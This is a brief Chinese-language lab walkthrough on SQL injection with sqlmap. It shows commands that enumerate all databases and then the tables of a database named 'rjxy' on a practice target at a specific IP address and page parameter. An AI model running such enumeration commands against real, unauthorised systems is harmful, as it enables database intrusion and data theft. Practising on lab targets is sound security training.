sqlmap靶机实战sql注入
一、寻找注入点
二、sqlmap中
1、查找数据库
sqlmap.py -u "注入点地址"
sqlmap.py -u “http://117.167.136.244:28026/index/narticle.php?nid=3100”
sqlmap.py -u “注入点地址” --dbs
sqlmap.py -u “http://117.167.136.244:28026/index/narticle.php?nid=3100” --dbs
如图,得到该站点的全部数据库
2、选定某个数据库,查询表
sqlmap.py -u “注入点地址” -D 目标数据库名 --tables
sqlmap.py -u “http://117.167.136.244:28026/index/narticle.php?nid=3100” -D rjxy --tables
如图,查询出了rjxy数据库中所有表的表名